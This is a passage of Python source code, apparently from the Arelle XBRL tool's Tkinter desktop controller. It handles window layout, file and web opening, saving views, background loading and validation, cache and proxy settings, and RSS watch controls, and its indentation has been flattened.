self.tabWinTopRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinLeftRt.add(self.tabWinTopRt)
self.tabWinBtm = Notebook(paneWinTopBtm)
self.tabWinBtm.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinBtm.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(self.tabWinBtm)
from arelle import ViewWinList
self.logView = ViewWinList.ViewList(None, self.tabWinBtm, _("messages"), True)
self.startLogging(logHandler=WinMainLogHandler(self)) # start logger
logViewMenu = self.logView.contextMenu(contextMenuClick=self.contextMenuClick)
logViewMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logViewMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
if self.hasClipboard:
logViewMenu.add_command(label=_("Copy to clipboard"), underline=0, command=lambda: self.logView.copyToClipboard(cntlr=self))
windowFrame.grid(row=0, column=0, sticky=(N,S,E,W))
windowFrame.columnconfigure(0, weight=999)
windowFrame.columnconfigure(1, weight=1)
windowFrame.rowconfigure(0, weight=1)
windowFrame.rowconfigure(1, weight=999)
windowFrame.rowconfigure(2, weight=1)
paneWinTopBtm.columnconfigure(0, weight=1)
paneWinTopBtm.rowconfigure(0, weight=1)
paneWinLeftRt.columnconfigure(0, weight=1)
paneWinLeftRt.rowconfigure(0, weight=1)
self.tabWinTopLeft.columnconfigure(0, weight=1)
self.tabWinTopLeft.rowconfigure(0, weight=1)
self.tabWinTopRt.columnconfigure(0, weight=1)
self.tabWinTopRt.rowconfigure(0, weight=1)
self.tabWinBtm.columnconfigure(0, weight=1)
self.tabWinBtm.rowconfigure(0, weight=1)
window = self.parent.winfo_toplevel()
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
priorState = self.config.get('windowState')
screenW = self.parent.winfo_screenwidth() - 16 # allow for window edge
screenH = self.parent.winfo_screenheight() - 64 # allow for caption and menus
if priorState == "zoomed":
self.parent.state("zoomed")
w = screenW
h = screenH
else:
priorGeometry = re.match("(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)",self.config.get('windowGeometry'))
if priorGeometry and priorGeometry.lastindex >= 4:
try:
w = int(priorGeometry.group(1))
h = int(priorGeometry.group(2))
x = int(priorGeometry.group(3))
y = int(priorGeometry.group(4))
if x + w > screenW:
if w < screenW:
x = screenW - w
else:
x = 0
w = screenW
elif x < 0:
x = 0
if w > screenW:
w = screenW
if y + h > screenH:
if y < screenH:
y = screenH - h
else:
y = 0
h = screenH
elif y < 0:
y = 0
if h > screenH:
h = screenH
self.parent.geometry("{0}x{1}+{2}+{3}".format(w,h,x,y))
except:
pass
# set top/btm divider
topLeftW, topLeftH = self.config.get('tabWinTopLeftSize',(250,300))
if 10 < topLeftW < w - 60:
self.tabWinTopLeft.config(width=topLeftW)
if 10 < topLeftH < h - 60:
self.tabWinTopLeft.config(height=topLeftH)
self.parent.title(_("arelle - Unnamed"))
self.logFile = None
self.uiThreadQueue = queue.Queue() # background processes communicate with ui thread
self.uiThreadChecker(self.statusbar) # start background queue
if not self.modelManager.disclosureSystem.select(self.config.setdefault("disclosureSystem", None)):
self.validateDisclosureSystem.set(False)
self.modelManager.validateDisclosureSystem = False
self.setValidateTooltipText()
def onTabChanged(self, event, *args):
try:
widgetIndex = event.widget.index("current")
tabId = event.widget.tabs()[widgetIndex]
for widget in event.widget.winfo_children():
if str(widget) == tabId:
self.currentView = widget.view
break
except (AttributeError, TypeError, TclError):
pass
def loadFileMenuHistory(self):
self.fileMenu.delete(self.fileMenuLength, self.fileMenuLength + 2)
fileHistory = self.config.setdefault("fileHistory", [])
self.recentFilesMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(fileHistory), 10 ) ):
self.recentFilesMenu.add_command(
label=fileHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["fileHistory"][j]))
self.fileMenu.add_cascade(label=_("Recent files"), menu=self.recentFilesMenu, underline=0)
importHistory = self.config.setdefault("importHistory", [])
self.recentAttachMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(importHistory), 10 ) ):
self.recentAttachMenu.add_command(
label=importHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["importHistory"][j],importToDTS=True))
self.fileMenu.add_cascade(label=_("Recent imports"), menu=self.recentAttachMenu, underline=0)
self.packagesMenu = Menu(self.menubar, tearoff=0)
hasPackages = False
for i, packageInfo in enumerate(sorted(PackageManager.packagesConfig.get("packages", []),
key=lambda packageInfo: packageInfo.get("name")),
start=1):
name = packageInfo.get("name", "package{}".format(i))
URL = packageInfo.get("URL")
if name and URL and packageInfo.get("status") == "enabled":
self.packagesMenu.add_command(
label=name,
command=lambda url=URL: self.fileOpenFile(url))
hasPackages = True
if hasPackages:
self.fileMenu.add_cascade(label=_("Packages"), menu=self.packagesMenu, underline=0)
def onPackageEnablementChanged(self):
self.loadFileMenuHistory()
def fileNew(self, *ignore):
if not self.okayToContinue():
return
self.logClear()
self.dirty = False
self.filename = None
self.data = {}
self.parent.title(_("arelle - Unnamed"));
self.modelManager.load(None);
def okayToContinue(self):
if not self.dirty:
return True
reply = tkinter.messagebox.askyesnocancel(
_("arelle - Unsaved Changes"),
_("Save unsaved changes?"),
parent=self.parent)
if reply is None:
return False
if reply:
return self.fileSave()
return True
def fileSave(self, view=None, fileType=None, *ignore):
if view is None:
view = getattr(self, "currentView", None)
if view is not None:
modelXbrl = view.modelXbrl
if isinstance(view, ViewWinRenderedGrid.ViewRenderedGrid):
initialdir = os.path.dirname(modelXbrl.modelDocument.uri)
if fileType in ("html", "xml", None):
if fileType == "html":
filename = self.uiFileDialog("save",
title=_("arelle - Save HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("HTML file .html"), "*.html"), (_("HTML file .htm"), "*.htm")],
defaultextension=".html")
elif fileType == "xml":
filename = self.uiFileDialog("save",
title=_("arelle - Save Table Layout Model"),
initialdir=initialdir,
filetypes=[(_("Layout model file .xml"), "*.xml")],
defaultextension=".xml")
else: # ask file type
filename = self.uiFileDialog("save",
title=_("arelle - Save XBRL Instance or HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml"), (_("HTML table .html"), "*.html"), (_("HTML table .htm"), "*.htm")],
defaultextension=".html")
if filename and (filename.endswith(".xbrl") or filename.endswith(".xml")):
view.saveInstance(filename)
return True
if not filename:
return False
try:
ViewFileRenderedGrid.viewRenderedGrid(modelXbrl, filename, lang=self.labelLang, sourceView=view)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif fileType == "xbrl":
return self.uiFileDialog("save",
title=_("arelle - Save Instance"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml")],
defaultextension=".xbrl")
elif isinstance(view, ViewWinTests.ViewTests) and modelXbrl.modelDocument.type in (ModelDocument.Type.TESTCASESINDEX, ModelDocument.Type.TESTCASE):
filename = self.uiFileDialog("save",
title=_("arelle - Save Test Results"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv")],
defaultextension=".csv")
if not filename:
return False
try:
ViewFileTests.viewTests(self.modelManager.modelXbrl, filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinTree.ViewTree):
filename = self.uiFileDialog("save",
title=_("arelle - Save {0}").format(view.tabTitle),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv"),(_("HTML file"), "*.html"),(_("XML file"), "*.xml"),(_("JSON file"), "*.json")],
defaultextension=".csv")
if not filename:
return False
try:
if isinstance(view, ViewWinRoleTypes.ViewRoleTypes):
ViewFileRoleTypes.viewRoleTypes(modelXbrl, filename, view.tabTitle, view.isArcrole, lang=view.lang)
elif isinstance(view, ViewWinConcepts.ViewConcepts):
ViewFileConcepts.viewConcepts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
else:
ViewFileRelationshipSet.viewRelationshipSet(modelXbrl, filename, view.tabTitle, view.arcrole, labelrole=view.labelrole, lang=view.lang)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinXml.ViewXml) and self.modelManager.modelXbrl.formulaOutputInstance:
filename = self.uiFileDialog("save",
title=_("arelle - Save Formula Result Instance Document"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("XBRL output instance .xml"), "*.xml"), (_("XBRL output instance .xbrl"), "*.xbrl")],
defaultextension=".xml")
if not filename:
return False
try:
from arelle import XmlUtil
with open(filename, "w") as fh:
XmlUtil.writexml(fh, self.modelManager.modelXbrl.formulaOutputInstance.modelDocument.xmlDocument, encoding="utf-8")
self.addToLog(_("[info] Saved formula output instance to {0}").format(filename) )
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True
tkinter.messagebox.showwarning(_("arelle - Save what?"),
_("Nothing has been selected that can be saved. \nPlease select a view pane that can be saved."),
parent=self.parent)
'''
if self.filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save File"),
initialdir=".",
filetypes=[(_("Xbrl file"), "*.x*")],
defaultextension=".xbrl")
if not filename:
return False
self.filename = filename
if not self.filename.endswith(".xbrl"):
self.filename += ".xbrl"
try:
with open(self.filename, "wb") as fh:
pickle.dump(self.data, fh, pickle.HIGHEST_PROTOCOL)
self.dirty = False
self.uiShowStatus(_("Saved {0} items to {1}").format(
len(self.data),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True;
'''
def saveDTSpackage(self):
self.modelManager.saveDTSpackage(allDTSes=True)
def fileOpen(self, *ignore):
if not self.okayToContinue():
return
filename = self.uiFileDialog("open",
title=_("arelle - Open file"),
initialdir=self.config.setdefault("fileOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xbrl")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please open web-accessed files with the second toolbar button, "Open web file", or the File menu, second entry, "Open web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename)
def importFileOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
filename = self.uiFileDialog("open",
title=_("arelle - Import file into opened DTS"),
initialdir=self.config.setdefault("importOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xml")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please import web-accessed files with the File menu, fourth entry, "Import web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename, importToDTS=True)
def updateFileHistory(self, url, importToDTS):
key = "importHistory" if importToDTS else "fileHistory"
fileHistory = self.config.setdefault(key, [])
while fileHistory.count(url) > 0:
fileHistory.remove(url)
if len(fileHistory) > 10:
fileHistory[10:] = []
fileHistory.insert(0, url)
self.config[key] = fileHistory
self.loadFileMenuHistory()
self.saveConfig()
def fileOpenFile(self, filename, importToDTS=False, selectTopView=False):
if filename:
filesource = None
# check for archive files
filesource = openFileSource(filename, self,
checkIfXmlIsEis=self.modelManager.disclosureSystem and
self.modelManager.disclosureSystem.EFM)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
filename = DialogOpenArchive.askArchiveFile(self, filesource)
if filename:
if importToDTS:
if not isHttpUrl(filename):
self.config["importOpenDir"] = os.path.dirname(filename)
else:
if not isHttpUrl(filename):
self.config["fileOpenDir"] = os.path.dirname(filesource.baseurl if filesource.isArchive else filename)
self.updateFileHistory(filename, importToDTS)
thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,importToDTS,selectTopView))
thread.daemon = True
thread.start()
def webOpen(self, *ignore):
if not self.okayToContinue():
return
url = DialogURL.askURL(self.parent, buttonSEC=True, buttonRSS=True)
if url:
self.updateFileHistory(url, False)
filesource = openFileSource(url,self)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
url = DialogOpenArchive.askArchiveFile(self, filesource)
self.updateFileHistory(url, False)
thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,False,False))
thread.daemon = True
thread.start()
def importWebOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
url = DialogURL.askURL(self.parent, buttonSEC=False, buttonRSS=False)
if url:
self.fileOpenFile(url, importToDTS=True)
def backgroundLoadXbrl(self, filesource, importToDTS, selectTopView):
startedAt = time.time()
try:
if importToDTS:
action = _("imported")
profileStat = "import"
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
ModelDocument.load(modelXbrl, filesource.url)
modelXbrl.relationshipSets.clear() # relationships have to be re-cached
else:
action = _("loaded")
profileStat = "load"
modelXbrl = self.modelManager.load(filesource, _("views loading"))
except ModelDocument.LoadingException:
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
except Exception as err:
msg = _("Exception loading {0}: {1}, at {2}").format(
filesource.url,
err,
traceback.format_tb(sys.exc_info()[2]))
# not sure if message box can be shown from background thread
# tkinter.messagebox.showwarning(_("Exception loading"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Loading terminated, unrecoverable error"), 20000)
return
if modelXbrl and modelXbrl.modelDocument:
statTime = time.time() - startedAt
modelXbrl.profileStat(profileStat, statTime)
self.addToLog(format_string(self.modelManager.locale,
_("%s in %.2f secs"),
(action, statTime)))
if modelXbrl.hasTableRendering:
self.showStatus(_("Initializing table rendering"))
RenderingEvaluator.init(modelXbrl)
self.showStatus(_("{0}, preparing views").format(action))
self.waitForUiThreadQueue() # force status update
self.uiThreadQueue.put((self.showLoadedXbrl, [modelXbrl, importToDTS, selectTopView]))
else:
self.addToLog(format_string(self.modelManager.locale,
_("not successfully %s in %.2f secs"),
(action, time.time() - startedAt)))
def showLoadedXbrl(self, modelXbrl, attach, selectTopView=False):
startedAt = time.time()
currentAction = "setting title"
topView = None
self.currentView = None
try:
if attach:
modelXbrl.closeViews()
self.parent.title(_("arelle - {0}").format(
os.path.basename(modelXbrl.modelDocument.uri)))
self.setValidateTooltipText()
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
currentAction = "tree view of tests"
ViewWinTests.viewTests(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
elif modelXbrl.modelDocument.type == ModelDocument.Type.VERSIONINGREPORT:
currentAction = "view of versioning report"
ViewWinVersReport.viewVersReport(modelXbrl, self.tabWinTopRt)
from arelle.ViewWinDiffs import ViewWinDiffs
ViewWinDiffs(modelXbrl, self.tabWinBtm, lang=self.labelLang)
elif modelXbrl.modelDocument.type == ModelDocument.Type.RSSFEED:
currentAction = "view of RSS feed"
ViewWinRssFeed.viewRssFeed(modelXbrl, self.tabWinTopRt)
topView = modelXbrl.views[-1]
else:
if modelXbrl.hasTableIndexing:
currentAction = "table index view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.euGroupTable,)), lang=self.labelLang,
treeColHdr="Table Index", showLinkroles=False, showColumns=False, expandAll=True)
elif modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table index view"
firstTableLinkroleURI = TableStructure.evaluateTableIndex(modelXbrl)
if firstTableLinkroleURI:
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
treeColHdr="Table Index", showRelationships=False, showColumns=False, expandAll=False, hasTableIndex=True)
'''
elif (modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET) and
not modelXbrl.hasTableRendering):
currentAction = "facttable ELRs view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopLeft, ("Tables", (XbrlConst.parentChild,)), lang=self.labelLang,
treeColHdr="Fact Table Index", showLinkroles=True, showColumns=False, showRelationships=False, expandAll=False)
'''
currentAction = "tree view of tests"
ViewWinDTS.viewDTS(modelXbrl, self.tabWinTopLeft, altTabWin=self.tabWinTopRt)
currentAction = "view of concepts"
ViewWinConcepts.viewConcepts(modelXbrl, self.tabWinBtm, "Concepts", lang=self.labelLang, altTabWin=self.tabWinTopRt)
if modelXbrl.hasTableRendering: # show rendering grid even without any facts
ViewWinRenderedGrid.viewRenderedGrid(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table view of facts"
if not modelXbrl.hasTableRendering: # table view only if not grid rendered view
ViewWinFactTable.viewFacts(modelXbrl, self.tabWinTopRt, linkrole=firstTableLinkroleURI, lang=self.labelLang, expandAll=firstTableLinkroleURI)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "tree/list of facts"
ViewWinFactList.viewFacts(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if modelXbrl.hasFormulae:
currentAction = "formulae view"
ViewWinFormulae.viewFormulae(modelXbrl, self.tabWinTopRt)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "presentation linkbase view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.parentChild, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "calculation linkbase view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.summationItem, lang=self.labelLang)
currentAction = "dimensions relationships view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "XBRL-dimensions", lang=self.labelLang)
if modelXbrl.hasTableRendering:
currentAction = "rendering view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "Table-rendering", lang=self.labelLang)
for name, arcroles in sorted(self.config.get("arcroleGroups", {}).items()):
if XbrlConst.arcroleGroupDetect in arcroles:
currentAction = name + " view"
ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, (name, arcroles), lang=self.labelLang)
currentAction = "property grid"
ViewWinProperties.viewProperties(modelXbrl, self.tabWinTopLeft)
currentAction = "log view creation time"
viewTime = time.time() - startedAt
modelXbrl.profileStat("view", viewTime)
self.addToLog(format_string(self.modelManager.locale,
_("views %.2f secs"), viewTime))
if selectTopView and topView:
topView.select()
self.currentView = topView
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Loaded"):
xbrlLoadedMethod(self, modelXbrl, attach) # runs in GUI thread
except Exception as err:
msg = _("Exception preparing {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showFormulaOutputInstance(self, priorOutputInstance, currentOutputInstance):
currentAction = "closing prior formula output instance"
try:
if priorOutputInstance: # if has UI must close on UI thread, not background thread
priorOutputInstance.close()
currentAction = "showing resulting formula output instance"
if currentOutputInstance:
ViewWinXml.viewXml(currentOutputInstance, self.tabWinBtm, "Formula Output Instance", currentOutputInstance.modelDocument.xmlDocument)
except Exception as err:
msg = _("Exception {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
self.addToLog(msg);
self.showStatus(_("Ready..."), 2000)
def showProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.logProfileStats()
def clearProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.profileStats.clear()
def fileClose(self, *ignore):
if not self.okayToContinue():
return
self.modelManager.close()
self.parent.title(_("arelle - Unnamed"))
self.setValidateTooltipText()
def validate(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
if (modelXbrl.modelManager.validateDisclosureSystem and
not modelXbrl.modelManager.disclosureSystem.selection):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Validation - disclosure system checks is requested but no disclosure system is selected, please select one by validation - select disclosure system."),
parent=self.parent)
else:
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
for pluginXbrlMethod in pluginClassMethods("Testcases.Start"):
pluginXbrlMethod(self, None, modelXbrl)
thread = threading.Thread(target=lambda: self.backgroundValidate())
thread.daemon = True
thread.start()
def backgroundValidate(self):
startedAt = time.time()
modelXbrl = self.modelManager.modelXbrl
priorOutputInstance = modelXbrl.formulaOutputInstance
modelXbrl.formulaOutputInstance = None # prevent closing on background thread by validateFormula
self.modelManager.validate()
self.addToLog(format_string(self.modelManager.locale,
_("validated in %.2f secs"),
time.time() - startedAt))
if not modelXbrl.isClosed and (priorOutputInstance or modelXbrl.formulaOutputInstance):
self.uiThreadQueue.put((self.showFormulaOutputInstance, [priorOutputInstance, modelXbrl.formulaOutputInstance]))
self.uiThreadQueue.put((self.logSelect, []))
def compareDTSes(self):
countLoadedDTSes = len(self.modelManager.loadedModelXbrls)
if countLoadedDTSes != 2:
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Two DTSes are required for the Compare DTSes operation, {0} found").format(countLoadedDTSes),
parent=self.parent)
return False
versReportFile = self.uiFileDialog("save",
title=_("arelle - Save Versioning Report File"),
initialdir=self.config.setdefault("versioningReportDir","."),
filetypes=[(_("Versioning report file"), "*.xml")],
defaultextension=".xml")
if not versReportFile:
return False
self.config["versioningReportDir"] = os.path.dirname(versReportFile)
self.saveConfig()
thread = threading.Thread(target=lambda: self.backgroundCompareDTSes(versReportFile))
thread.daemon = True
thread.start()
def backgroundCompareDTSes(self, versReportFile):
startedAt = time.time()
modelVersReport = self.modelManager.compareDTSes(versReportFile)
if modelVersReport and modelVersReport.modelDocument:
self.addToLog(format_string(self.modelManager.locale,
_("compared in %.2f secs"),
time.time() - startedAt))
self.uiThreadQueue.put((self.showComparedDTSes, [modelVersReport]))
def showComparedDTSes(self, modelVersReport):
# close prior DTS displays
modelVersReport.modelDocument.fromDTS.closeViews()
modelVersReport.modelDocument.toDTS.closeViews()
self.showLoadedXbrl(modelVersReport, True)
def loadFile(self, filename):
self.filename = filename
self.listBox.delete(0, END)
self.dirty = False
try:
with open(self.filename, "rb") as fh:
self.data = pickle.load(fh)
for name in sorted(self.data, key=str.lower):
self.listBox.insert(END, name)
self.showStatus(_("Loaded {0} items from {1}").format(
self.listbox.size(),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to load {0}\n{1}").format(
self.filename,
err),
parent=self.parent)
def quit(self, event=None, restartAfterQuit=False):
if self.okayToContinue():
self.modelManager.close()
logging.shutdown()
global restartMain
restartMain = restartAfterQuit
state = self.parent.state()
if state == "normal":
self.config["windowGeometry"] = self.parent.geometry()
if state in ("normal", "zoomed"):
self.config["windowState"] = state
if self.isMSW: adjustW = 4; adjustH = 6 # tweak to prevent splitter regions from growing on reloading
elif self.isMac: adjustW = 54; adjustH = 39
else: adjustW = 2; adjustH = 2 # linux (tested on ubuntu)
self.config["tabWinTopLeftSize"] = (self.tabWinTopLeft.winfo_width() - adjustW,
self.tabWinTopLeft.winfo_height() - adjustH)
super(CntlrWinMain, self).close(saveConfig=True)
self.parent.unbind_all(())
self.parent.destroy()
if self.logFile:
self.logFile.close()
self.logFile = None
def restart(self, event=None):
self.quit(event, restartAfterQuit=True)
def setWorkOffline(self, *args):
self.webCache.workOffline = self.workOffline.get()
self.config["workOffline"] = self.webCache.workOffline
self.saveConfig()
def confirmClearWebCache(self):
if tkinter.messagebox.askyesno(
_("arelle - Clear Internet Cache"),
_("Are you sure you want to clear the internet cache?"),
parent=self.parent):
def backgroundClearCache():
self.showStatus(_("Clearing internet cache"))
self.webCache.clear()
self.showStatus(_("Internet cache cleared"), 5000)
thread = threading.Thread(target=lambda: backgroundClearCache())
thread.daemon = True
thread.start()
def manageWebCache(self):
if sys.platform.startswith("win"):
command = 'explorer'
elif sys.platform in ("darwin", "macos"):
command = 'open'
else: # linux/unix
command = 'xdg-open'
try:
subprocess.Popen([command,self.webCache.cacheDir])
except:
pass
def setupProxy(self):
from arelle.DialogUserPassword import askProxy
proxySettings = askProxy(self.parent, self.config.get("proxySettings"))
if proxySettings:
self.webCache.resetProxies(proxySettings)
self.config["proxySettings"] = proxySettings
self.saveConfig()
def setValidateDisclosureSystem(self, *args):
self.modelManager.validateDisclosureSystem = self.validateDisclosureSystem.get()
self.config["validateDisclosureSystem"] = self.modelManager.validateDisclosureSystem
self.saveConfig()
if self.modelManager.validateDisclosureSystem:
if not self.modelManager.disclosureSystem or not self.modelManager.disclosureSystem.selection:
self.selectDisclosureSystem()
self.setValidateTooltipText()
def selectDisclosureSystem(self, *args):
from arelle import DialogOpenArchive
self.config["disclosureSystem"] = DialogOpenArchive.selectDisclosureSystem(self, self.modelManager.disclosureSystem)
self.saveConfig()
self.setValidateTooltipText()
def formulaParametersDialog(self, *args):
DialogFormulaParameters.getParameters(self)
self.setValidateTooltipText()
def rssWatchOptionsDialog(self, *args):
from arelle import DialogRssWatch
DialogRssWatch.getOptions(self)
# find or open rssWatch view
def rssWatchControl(self, start=False, stop=False, close=False):
from arelle.ModelDocument import Type
from arelle import WatchRss
if not self.modelManager.rssWatchOptions.get("feedSourceUri"):
tkinter.messagebox.showwarning(_("RSS Watch Control Error"),
_("RSS Feed is not set up, please select options and select feed"),
parent=self.parent)
return False
rssModelXbrl = None
for loadedModelXbrl in self.modelManager.loadedModelXbrls:
if (loadedModelXbrl.modelDocument.type == Type.RSSFEED and
loadedModelXbrl.modelDocument.uri == self.modelManager.rssWatchOptions.get("feedSourceUri")):
rssModelXbrl = loadedModelXbrl
break
#not loaded
if start:
if not rssModelXbrl:
rssModelXbrl = self.modelManager.create(Type.RSSFEED, self.modelManager.rssWatchOptions.get("feedSourceUri"))
self.showLoadedXbrl(rssModelXbrl, False)
if not hasattr(rssModelXbrl,"watchRss"):
WatchRss.initializeWatcher(rssModelXbrl)
rssModelXbrl.watchRss.start()
elif stop:
if rssModelXbrl and rssModelXbrl.watchRss:
rssModelXbrl.watchRss.stop()
# for ui thread option updating
def rssWatchUpdateOption(self, latestPubDate=None):
self.uiThreadQueue.put((self.uiRssWatchUpdateOption, [latestPubDate]))
# ui thread addToLog
def uiRssWatchUpdateOption(self, latestPubDate):
if latestPubDate:
self.modelManager.rssWatchOptions["latestPubDate"] = latestPubDate
self.config["rssWatchOptions"] = self.modelManager.rssWatchOptions
self.saveConfig()
def languagesDialog(self, *args):
override = self.lang if self.lang != self.modelManager.defaultLang else ""
import tkinter.simpledialog
newValue = tkinter.simpledialog.askstring(_("arelle - Labels language code setting"),
_("The system default language is: {0} \n\n"
"You may override with a different language for labels display. \n\n"
"Current language override code: {1} \n"
"(Leave empty to use the system default language.)").format(
self.modelManager.defaultLang, override),
parent=self.parent)
if newValue is not None:
self.config["labelLangOverride"] = newValue
if newValue:
self.lang = newValue
else:
self.lang = self.modelManager.defaultLang
if self.modelManager.modelXbrl and self.modelManager.modelXbrl.modelDocument:
self.showLoadedXbrl(self.modelManager.modelXbrl, True) # reload views
self.saveConfig()
def setValidateTooltipText(self):
if self.modelManager.modelXbrl and not self.modelManager.modelXbrl.isClosed and self.modelManager.modelXbrl.modelDocument is not None:
valType = self.modelManager.modelXbrl.modelDocument.type
if valType in (ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE):
valName = "DTS"
else:
valName = ModelDocument.Type.typeName[valType]
if valType == ModelDocument.Type.VERSIONINGREPORT:
v = _("Validate versioning report")
else:
if self.modelManager.validateCalcLB:
if self.modelManager.validateInferDecimals:
c = _("\nCheck calculations (infer decimals)")
else:
c = _("\nCheck calculations (infer precision)")
else:
c = ""
if self.modelManager.validateUtr:
u = _("\nCheck unit type registry")
else:
u = ""
if self.modelManager.validateDisclosureSystem:
